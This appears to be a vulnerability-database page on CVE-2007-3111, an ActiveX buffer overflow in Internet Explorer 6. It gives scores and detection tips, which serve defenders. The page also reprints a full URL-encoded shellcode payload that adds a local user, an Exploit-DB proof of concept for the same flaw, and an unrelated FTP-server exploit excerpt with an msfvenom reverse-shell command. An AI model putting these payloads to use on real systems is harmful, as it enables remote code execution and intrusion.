CVE-2007-3111
published 2007-06-07CVE-2007-3111: Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote…
PriorityP349critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
47.16%
98.7th percentile
Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| provideo | camimage_activex_control | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandCamimage.URL = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com"↗
bytes↗
%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44
- →Monitor for ActiveX instantiation of the Provideo Camimage control (ISSCamControl.dll) within Internet Explorer; a long string (>97 'a' chars) passed to the URL property is the exploit trigger. ↗
- →The exploit constructs a malicious URL of the form 'http://www.' + 97×'a' + SEH_overwrite + NOP_sled + shellcode + '.com' assigned to Camimage.URL — detect abnormally long URL property values set on this ActiveX control. ↗
- →The SEH overwrite targets address 0x77e6161e ('call edi') inside user32.dll on Windows 2000 SP4 — look for SEH chain corruption pointing to this address in crash/exploit telemetry. ↗
- →The shellcode payload adds a local user account ('su'/'tzu'); post-exploitation, monitor for unexpected new local user creation following ISSCamControl.dll activity. ↗
- ·The exploit and SEH gadget address (0x77e6161e in user32.dll) are specific to Windows 2000 SP4 with Internet Explorer 6; the address will differ on other OS/patch levels. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd
Exploit-DB
Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow
exploitdb·2007-06-02
CVE-2007-3111 Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow
Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow
---
REM metasploit one, add a user 'su' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%
No writeups or analysis indexed.
http://osvdb.org/36962http://secunia.com/advisories/25479http://www.securityfocus.com/bid/24279http://www.vupen.com/english/advisories/2007/2042https://exchange.xforce.ibmcloud.com/vulnerabilities/34691https://www.exploit-db.com/exploits/4023http://osvdb.org/36962http://secunia.com/advisories/25479http://www.securityfocus.com/bid/24279http://www.vupen.com/english/advisories/2007/2042https://exchange.xforce.ibmcloud.com/vulnerabilities/34691https://www.exploit-db.com/exploits/4023
2007-06-07
Published